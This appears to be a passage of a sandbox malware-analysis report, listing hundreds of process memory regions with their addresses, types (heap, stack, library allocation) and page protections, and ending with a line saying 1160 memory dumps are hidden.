unkown
|
page readonly
|
||
7FFEB8AF0000
|
trusted library allocation
|
page read and write
|
||
7FD000
|
unkown
|
page readonly
|
||
4430000
|
trusted library allocation
|
page read and write
|
||
16ED000
|
trusted library allocation
|
page execute and read and write
|
||
7FFEB8B00000
|
trusted library allocation
|
page read and write
|
||
212A16D3000
|
heap
|
page read and write
|
||
12FD000
|
heap
|
page read and write
|
||
CF6267E000
|
unkown
|
page readonly
|
||
7FFEB89A0000
|
trusted library allocation
|
page read and write
|
||
1210000
|
heap
|
page read and write
|
||
7FFEB87F2000
|
trusted library allocation
|
page read and write
|
||
9CD3AFE000
|
stack
|
page read and write
|
||
2C69000
|
trusted library allocation
|
page read and write
|
||
7FFEB89A0000
|
trusted library allocation
|
page read and write
|
||
9AF067E000
|
unkown
|
page readonly
|
||
7FFEB89CC000
|
trusted library allocation
|
page read and write
|
||
212A17B0000
|
heap
|
page read and write
|
||
7FFEB8B4E000
|
trusted library allocation
|
page read and write
|
||
22170413000
|
heap
|
page read and write
|
||
AB22AF8000
|
stack
|
page read and write
|
||
24F94668000
|
heap
|
page read and write
|
||
1BCA6000
|
unkown
|
page readonly
|
||
17F97C85000
|
heap
|
page read and write
|
||
7FFEB8BA0000
|
trusted library allocation
|
page read and write
|
||
F43B3FD000
|
stack
|
page read and write
|
||
212BEEEB000
|
heap
|
page read and write
|
||
12A5E000
|
trusted library allocation
|
page read and write
|
||
267EA866000
|
heap
|
page read and write
|
||
212BEEB6000
|
heap
|
page read and write
|
||
7FFEB8B20000
|
trusted library allocation
|
page read and write
|
||
1261000
|
heap
|
page read and write
|
||
2ED0000
|
heap
|
page read and write
|
||
7FFEB88C6000
|
trusted library allocation
|
page execute and read and write
|
||
F43AA7E000
|
stack
|
page read and write
|
||
227B77D0000
|
heap
|
page read and write
|
||
7FFEB8AC0000
|
trusted library allocation
|
page read and write
|
||
2FDE000
|
stack
|
page read and write
|
||
227B8EAE000
|
heap
|
page read and write
|
||
17F97BE0000
|
heap
|
page read and write
|
||
227B78E7000
|
heap
|
page read and write
|
||
CA9000
|
heap
|
page read and write
|
||
E2D000
|
stack
|
page read and write
|
||
7FFEB88B0000
|
trusted library allocation
|
page read and write
|
||
9CD327B000
|
stack
|
page read and write
|
||
227B8F26000
|
heap
|
page read and write
|
||
7FFEB8824000
|
trusted library allocation
|
page read and write
|
||
C70000
|
trusted library allocation
|
page read and write
|
||
7FFEB8A26000
|
trusted library allocation
|
page read and write
|
||
ED5DA7B000
|
stack
|
page read and write
|
||
4510000
|
trusted library allocation
|
page read and write
|
||
1B3E3000
|
heap
|
page execute and read and write
|
||
17F97A10000
|
heap
|
page read and write
|
||
7FFEB87F0000
|
trusted library allocation
|
page read and write
|
||
AB222F3000
|
stack
|
page read and write
|
||
A35000
|
heap
|
page read and write
|
||
7FFEB8B5A000
|
trusted library allocation
|
page read and write
|
||
7FFEB8BF0000
|
trusted library allocation
|
page read and write
|
||
2217040B000
|
heap
|
page read and write
|
||
227BD070000
|
trusted library allocation
|
page read and write
|
||
227B8D30000
|
trusted library allocation
|
page read and write
|
||
1C15D000
|
stack
|
page read and write
|
||
55BB000
|
stack
|
page read and write
|
||
43FE000
|
trusted library allocation
|
page read and write
|
||
7FFEB8A20000
|
trusted library allocation
|
page read and write
|
||
7FFEB8BD0000
|
trusted library allocation
|
page read and write
|
||
24F94C60000
|
trusted library allocation
|
page read and write
|
||
7FFEB8C10000
|
trusted library allocation
|
page read and write
|
||
7FFEB8990000
|
trusted library allocation
|
page read and write
|
||
212A30A8000
|
heap
|
page read and write
|
||
22170290000
|
heap
|
page read and write
|
||
7FFEB8AE0000
|
trusted library allocation
|
page read and write
|
||
212BBFB9000
|
heap
|
page read and write
|
||
4401000
|
trusted library allocation
|
page read and write
|
||
7FFEB8A28000
|
trusted library allocation
|
page read and write
|
||
7FFEB89E8000
|
trusted library allocation
|
page read and write
|
||
9CD40FE000
|
stack
|
page read and write
|
||
22170502000
|
heap
|
page read and write
|
||
9AF0A7E000
|
unkown
|
page readonly
|
||
24F94658000
|
heap
|
page read and write
|
||
9AF00FE000
|
stack
|
page read and write
|
||
7FFEB8A74000
|
trusted library allocation
|
page read and write
|
||
24F946A8000
|
heap
|
page read and write
|
||
267EA750000
|
heap
|
page read and write
|
||
212A3A29000
|
trusted library allocation
|
page read and write
|
||
1B420000
|
heap
|
page read and write
|
||
AB22C7E000
|
stack
|
page read and write
|
||
212BEF03000
|
heap
|
page read and write
|
||
4DDD000
|
stack
|
page read and write
|
||
F6E000
|
stack
|
page read and write
|
||
2217048E000
|
heap
|
page read and write
|
||
227B8F0D000
|
heap
|
page read and write
|
||
1D90000
|
trusted library allocation
|
page read and write
|
||
16D0000
|
trusted library allocation
|
page read and write
|
||
212A32A4000
|
trusted library allocation
|
page read and write
|
||
7FFEB89C0000
|
trusted library allocation
|
page read and write
|
||
1320000
|
heap
|
page read and write
|
||
12A71000
|
trusted library allocation
|
page read and write
|
||
7FFEB87F4000
|
trusted library allocation
|
page read and write
|
||
F43A4FE000
|
stack
|
page readonly
|
||
227B785C000
|
heap
|
page read and write
|
||
16F7000
|
trusted library allocation
|
page read and write
|
||
227BD073000
|
trusted library allocation
|
page read and write
|
||
5B00000
|
heap
|
page read and write
|
||
176F000
|
stack
|
page read and write
|
||
7FFEB88A0000
|
trusted library allocation
|
page read and write
|
||
9AF087E000
|
unkown
|
page readonly
|
||
212A3221000
|
trusted library allocation
|
page read and write
|
||
7FFEB8AE0000
|
trusted library allocation
|
page read and write
|
||
7FFEB8C10000
|
trusted library allocation
|
page execute and read and write
|
||
F43B1FD000
|
stack
|
page read and write
|
||
227B8F3C000
|
heap
|
page read and write
|
||
7FFEB8B40000
|
trusted library allocation
|
page read and write
|
||
227B7AD0000
|
heap
|
page read and write
|
||
212BEFEB000
|
heap
|
page read and write
|
||
212BEEC8000
|
heap
|
page read and write
|
||
227B8D01000
|
trusted library allocation
|
page read and write
|
||
7FFEB883C000
|
trusted library allocation
|
page execute and read and write
|
||
D32000
|
heap
|
page read and write
|
||
7FFEB89D2000
|
trusted library allocation
|
page read and write
|
||
212A3544000
|
trusted library allocation
|
page read and write
|
||
7FFEB8980000
|
trusted library allocation
|
page read and write
|
||
2F30000
|
heap
|
page read and write
|
||
7FFEB8B10000
|
trusted library allocation
|
page read and write
|
||
4440000
|
trusted library allocation
|
page read and write
|
||
227B7899000
|
heap
|
page read and write
|
||
212B3320000
|
trusted library allocation
|
page read and write
|
||
212BD6BA000
|
heap
|
page read and write
|
||
22170485000
|
heap
|
page read and write
|
||
227B8102000
|
heap
|
page read and write
|
||
227B8F43000
|
heap
|
page read and write
|
||
B28000
|
heap
|
page read and write
|
||
227B8E62000
|
heap
|
page read and write
|
||
54D0000
|
heap
|
page execute and read and write
|
||
2136000
|
trusted library allocation
|
page read and write
|
||
7FFEB8A98000
|
trusted library allocation
|
page read and write
|
||
7FFEB880D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFEB89F5000
|
trusted library allocation
|
page read and write
|
||
7FFEB8A30000
|
trusted library allocation
|
page read and write
|
||
E4B000
|
heap
|
page read and write
|
||
7FFEB8AA0000
|
trusted library allocation
|
page read and write
|
||
212BB96D000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
7FFEB8BC0000
|
trusted library allocation
|
page read and write
|
||
7FFEB8AB0000
|
trusted library allocation
|
page read and write
|
||
AB2317D000
|
stack
|
page read and write
|
||
CF62FFE000
|
stack
|
page read and write
|
||
22AC000
|
trusted library allocation
|
page read and write
|
||
21A4000
|
trusted library allocation
|
page read and write
|
||
212A35EB000
|
trusted library allocation
|
page read and write
|
||
227B8E5C000
|
heap
|
page read and write
|
||
1716000
|
trusted library allocation
|
page execute and read and write
|
||
7FFEB8B5C000
|
trusted library allocation
|
page read and write
|
||
227B8F28000
|
heap
|
page read and write
|
||
267EA913000
|
heap
|
page read and write
|
||
7FFEB8BE0000
|
trusted library allocation
|
page execute and read and write
|
||
1417000
|
trusted library allocation
|
page execute and read and write
|
||
7FFEB8A60000
|
trusted library allocation
|
page read and write
|
||
212A166B000
|
heap
|
page read and write
|
||
227B78B0000
|
heap
|
page read and write
|
||
59FE000
|
stack
|
page read and write
|
||
F70000
|
trusted library allocation
|
page read and write
|
||
263000
|
unkown
|
page readonly
|
||
22170440000
|
heap
|
page read and write
|
||
10F0000
|
heap
|
page read and write
|
||
212BBDB3000
|
heap
|
page read and write
|
||
13A5000
|
heap
|
page read and write
|
||
30C1000
|
trusted library allocation
|
page read and write
|
||
AEA000
|
heap
|
page read and write
|
||
1BB02000
|
unkown
|
page readonly
|
||
7FFEB8A70000
|
trusted library allocation
|
page read and write
|
||
1B4D5000
|
heap
|
page read and write
|
||
126F000
|
heap
|
page read and write
|
||
2302000
|
trusted library allocation
|
page read and write
|
||
212A38E5000
|
trusted library allocation
|
page read and write
|
||
E50000
|
heap
|
page read and write
|
||
AB22E7E000
|
stack
|
page read and write
|
||
212A3908000
|
trusted library allocation
|
page read and write
|
||
7FFEB8A20000
|
trusted library allocation
|
page read and write
|
||
AB22B3E000
|
stack
|
page read and write
|
||
782000
|
unkown
|
page readonly
|
||
24F9465A000
|
heap
|
page read and write
|
||
24F944D0000
|
heap
|
page read and write
|
||
CF6187B000
|
stack
|
page read and write
|
||
24F945D0000
|
heap
|
page read and write
|
||
7FFEB89BF000
|
trusted library allocation
|
page read and write
|
||
22170500000
|
heap
|
page read and write
|
||
17C0000
|
heap
|
page read and write
|
||
9AF057E000
|
stack
|
page read and write
|
||
1E60000
|
trusted library allocation
|
page read and write
|
||
1C050000
|
heap
|
page read and write
|
||
212BD660000
|
heap
|
page read and write
|
||
212A18A5000
|
heap
|
page read and write
|
||
22170C02000
|
heap
|
page read and write
|
||
7FFEB88A6000
|
trusted library allocation
|
page read and write
|
||
13D0000
|
trusted library allocation
|
page read and write
|
||
9AF017E000
|
unkown
|
page readonly
|
||
14D0000
|
heap
|
page read and write
|
||
187E000
|
stack
|
page read and write
|
||
212BBDB0000
|
heap
|
page read and write
|
||
212A36C0000
|
trusted library allocation
|
page read and write
|
||
2A60000
|
heap
|
page execute and read and write
|
||
7FFEB89C0000
|
trusted library allocation
|
page read and write
|
||
ED5DEFC000
|
stack
|
page read and write
|
||
1F8A4E84000
|
heap
|
page read and write
|
||
D78000
|
heap
|
page read and write
|
||
227B7902000
|
heap
|
page read and write
|
||
212BEFB8000
|
heap
|
page read and write
|
||
9CD3BFE000
|
unkown
|
page readonly
|
||
16AC000
|
stack
|
page read and write
|
||
212BEEBC000
|
heap
|
page read and write
|
||
7FFEB8B4C000
|
trusted library allocation
|
page read and write
|
||
212A35B9000
|
trusted library allocation
|
page read and write
|
||
495E000
|
stack
|
page read and write
|
||
1BA80000
|
heap
|
page execute and read and write
|
||
AA0000
|
heap
|
page read and write
|
||
1BA0E000
|
stack
|
page read and write
|
||
227B783F000
|
heap
|
page read and write
|
||
7FFEB8A00000
|
trusted library allocation
|
page read and write
|
||
212BD69B000
|
heap
|
page read and write
|
||
5970000
|
trusted library allocation
|
page execute and read and write
|
||
2E62000
|
unkown
|
page readonly
|
||
7FFEB8A50000
|
trusted library allocation
|
page read and write
|
||
227B78AB000
|
heap
|
page read and write
|
||
212BD573000
|
heap
|
page read and write
|
||
1640000
|
trusted library allocation
|
page read and write
|
||
5960000
|
trusted library allocation
|
page read and write
|
||
F43B07E000
|
stack
|
page read and write
|
||
227B8DF0000
|
trusted library allocation
|
page read and write
|
||
5E3D000
|
stack
|
page read and write
|
||
7FFEB8803000
|
trusted library allocation
|
page read and write
|
||
AB2307F000
|
stack
|
page read and write
|
||
7FFEB881B000
|
trusted library allocation
|
page execute and read and write
|
||
4BF0000
|
trusted library allocation
|
page read and write
|
||
212BEF3B000
|
heap
|
page read and write
|
||
16E3000
|
trusted library allocation
|
page execute and read and write
|
||
D1D000
|
stack
|
page read and write
|
||
227B815A000
|
heap
|
page read and write
|
||
7FFEB89AD000
|
trusted library allocation
|
page read and write
|
||
156E000
|
stack
|
page read and write
|
||
1F8A4F02000
|
heap
|
page read and write
|
||
35C0000
|
heap
|
page read and write
|
||
7FFEB88B0000
|
trusted library allocation
|
page execute and read and write
|
||
227B7822000
|
heap
|
page read and write
|
||
34D8000
|
trusted library allocation
|
page read and write
|
||
212BD68B000
|
heap
|
page read and write
|
||
1D1B2000
|
heap
|
page read and write
|
||
227B8E65000
|
heap
|
page read and write
|
||
1F81000
|
trusted library allocation
|
page read and write
|
||
1C516000
|
stack
|
page read and write
|
||
36CF000
|
stack
|
page read and write
|
||
CF62A7E000
|
unkown
|
page readonly
|
||
CCD000
|
heap
|
page read and write
|
||
212A32A8000
|
trusted library allocation
|
page read and write
|
||
2A51000
|
trusted library allocation
|
page read and write
|
||
499E000
|
stack
|
page read and write
|
||
7FFEB8CA0000
|
trusted library allocation
|
page read and write
|
||
227B7F60000
|
trusted library allocation
|
page read and write
|
||
1F8A4E16000
|
heap
|
page read and write
|
||
212BEF7E000
|
heap
|
page read and write
|
||
ED5DFFC000
|
stack
|
page read and write
|
||
212A3477000
|
trusted library allocation
|
page read and write
|
||
4ADE000
|
stack
|
page read and write
|
||
133C000
|
heap
|
page read and write
|
||
2E30000
|
trusted library allocation
|
page read and write
|
||
212BEED1000
|
heap
|
page read and write
|
||
7FFEB89A6000
|
trusted library allocation
|
page read and write
|
||
212A1870000
|
heap
|
page read and write
|
||
AB22D7A000
|
stack
|
page read and write
|
||
CF6117E000
|
unkown
|
page readonly
|
||
1F8A4E81000
|
heap
|
page read and write
|
||
212BC005000
|
heap
|
page read and write
|
||
2BF7000
|
trusted library allocation
|
page read and write
|
||
7FFEB8A40000
|
trusted library allocation
|
page read and write
|
||
1326000
|
heap
|
page read and write
|
||
24F94644000
|
heap
|
page read and write
|
||
140A000
|
trusted library allocation
|
page execute and read and write
|
||
451A000
|
trusted library allocation
|
page read and write
|
||
212BEE90000
|
heap
|
page read and write
|
||
17A0000
|
trusted library allocation
|
page read and write
|
||
1725000
|
trusted library allocation
|
page execute and read and write
|
||
110E000
|
stack
|
page read and write
|
||
212A16DC000
|
heap
|
page read and write
|
||
7FFEB884C000
|
trusted library allocation
|
page execute and read and write
|
||
CF61F7E000
|
unkown
|
page readonly
|
||
15DE000
|
stack
|
page read and write
|
||
4C10000
|
trusted library allocation
|
page read and write
|
||
45A0000
|
trusted library allocation
|
page read and write
|
||
7FFEB8A1E000
|
trusted library allocation
|
page read and write
|
||
227BD080000
|
trusted library allocation
|
page read and write
|
||
7F0000
|
unkown
|
page readonly
|
||
166E000
|
stack
|
page read and write
|
||
12E0000
|
heap
|
page read and write
|
||
DF8000
|
heap
|
page read and write
|
||
5F3A000
|
stack
|
page read and write
|
||
1790000
|
trusted library allocation
|
page execute and read and write
|
||
7FFEB8B20000
|
trusted library allocation
|
page read and write
|
||
24F9465D000
|
heap
|
page read and write
|
||
16B0000
|
heap
|
page read and write
|
||
CF6167C000
|
stack
|
page read and write
|
||
21A8000
|
trusted library allocation
|
page read and write
|
||
9AF007E000
|
unkown
|
page readonly
|
||
166E000
|
stack
|
page read and write
|
||
7FFEB8A60000
|
trusted library allocation
|
page read and write
|
||
212BF042000
|
heap
|
page read and write
|
||
2EA0000
|
trusted library allocation
|
page read and write
|
||
212BC00E000
|
heap
|
page read and write
|
||
212A32AC000
|
trusted library allocation
|
page read and write
|
||
1D80000
|
trusted library allocation
|
page read and write
|
||
CF1000
|
heap
|
page read and write
|
||
141B000
|
trusted library allocation
|
page execute and read and write
|
||
227B8E43000
|
heap
|
page read and write
|
||
227B87A0000
|
trusted library section
|
page readonly
|
||
1365000
|
heap
|
page read and write
|
||
CF6127E000
|
stack
|
page read and write
|
||
4420000
|
trusted library allocation
|
page read and write
|
||
114E000
|
stack
|
page read and write
|
||
4DF0000
|
heap
|
page read and write
|
||
7FFEB89E5000
|
trusted library allocation
|
page read and write
|
||
212B3455000
|
trusted library allocation
|
page read and write
|
||
227B7F70000
|
trusted library section
|
page read and write
|
||
212BEF59000
|
heap
|
page read and write
|
||
13FD000
|
trusted library allocation
|
page execute and read and write
|
||
212BD142000
|
trusted library allocation
|
page read and write
|
||
CA7000
|
heap
|
page read and write
|
||
10D0000
|
heap
|
page read and write
|
||
7FFEB8810000
|
trusted library allocation
|
page read and write
|
||
227B8000000
|
heap
|
page read and write
|
||
CE3000
|
heap
|
page read and write
|
||
227B789F000
|
heap
|
page read and write
|
||
212BB220000
|
trusted library allocation
|
page read and write
|
||
CF60EFD000
|
stack
|
page read and write
|
||
212BEEF5000
|
heap
|
page read and write
|
||
45D0000
|
trusted library allocation
|
page read and write
|
||
227B8DC1000
|
trusted library allocation
|
page read and write
|
||
AA9000
|
heap
|
page read and write
|
||
7FFEB8BA0000
|
trusted library allocation
|
page read and write
|
||
4C20000
|
trusted library allocation
|
page execute and read and write
|
||
267EA87B000
|
heap
|
page read and write
|
||
7FFEB89D8000
|
trusted library allocation
|
page read and write
|
||
1B448000
|
heap
|
page read and write
|
||
28C2000
|
unkown
|
page readonly
|
||
D97000
|
heap
|
page read and write
|
||
7FFEB8A00000
|
trusted library allocation
|
page read and write
|
||
7FFEB87F3000
|
trusted library allocation
|
page execute and read and write
|
||
40C1000
|
trusted library allocation
|
page read and write
|
||
212A1722000
|
heap
|
page read and write
|
||
2F2C000
|
trusted library allocation
|
page read and write
|
||
227B8E48000
|
heap
|
page read and write
|
||
212BD6D8000
|
heap
|
page read and write
|
||
1890000
|
heap
|
page read and write
|
||
AEB000
|
stack
|
page read and write
|
||
7FFEB8C00000
|
trusted library allocation
|
page read and write
|
||
1BD40000
|
heap
|
page read and write
|
||
CF6247E000
|
stack
|
page read and write
|
||
7FFEB89A0000
|
trusted library allocation
|
page read and write
|
||
212BD120000
|
trusted library allocation
|
page read and write
|
||
131C000
|
heap
|
page read and write
|
||
227B8D60000
|
trusted library allocation
|
page read and write
|
||
4C70000
|
trusted library allocation
|
page read and write
|
||
F43A7FE000
|
unkown
|
page readonly
|
||
D2D000
|
heap
|
page read and write
|
||
1BDA5000
|
heap
|
page read and write
|
||
56BD000
|
stack
|
page read and write
|
||
212BEFDE000
|
heap
|
page read and write
|
||
CF61077000
|
stack
|
page read and write
|
||
7FFEB89E0000
|
trusted library allocation
|
page read and write
|
||
E40000
|
heap
|
page read and write
|
||
AB226FE000
|
stack
|
page read and write
|
||
7FFEB88A0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFEB8A34000
|
trusted library allocation
|
page read and write
|
||
7FFEB89C0000
|
trusted library allocation
|
page read and write
|
||
18D227E000
|
stack
|
page read and write
|
||
804000
|
unkown
|
page read and write
|
||
9CD38FB000
|
stack
|
page read and write
|
||
7FFEB87F0000
|
trusted library allocation
|
page read and write
|
||
227BD0F0000
|
trusted library allocation
|
page read and write
|
||
7FFEB8B4A000
|
trusted library allocation
|
page read and write
|
||
7FFEB8A2E000
|
trusted library allocation
|
page read and write
|
||
7FFEB881D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFEB87F2000
|
trusted library allocation
|
page read and write
|
||
22170428000
|
heap
|
page read and write
|
||
212A1590000
|
heap
|
page read and write
|
||
7FFEB8B60000
|
trusted library allocation
|
page read and write
|
||
7FFEB8A64000
|
trusted library allocation
|
page read and write
|
||
32E0000
|
heap
|
page read and write
|
||
7FFEB8A6B000
|
trusted library allocation
|
page read and write
|
||
7FFEB8BD0000
|
trusted library allocation
|
page read and write
|
||
7FFEB8890000
|
trusted library allocation
|
page read and write
|
||
F43A6FD000
|
stack
|
page read and write
|
||
212B3416000
|
trusted library allocation
|
page read and write
|
||
7FFEB89AC000
|
trusted library allocation
|
page read and write
|
||
7FFEB89A9000
|
trusted library allocation
|
page read and write
|
||
1720000
|
trusted library allocation
|
page read and write
|
||
F15000
|
heap
|
page read and write
|
||
1BA4E000
|
stack
|
page read and write
|
There are 1160 hidden memdumps, click here to show them.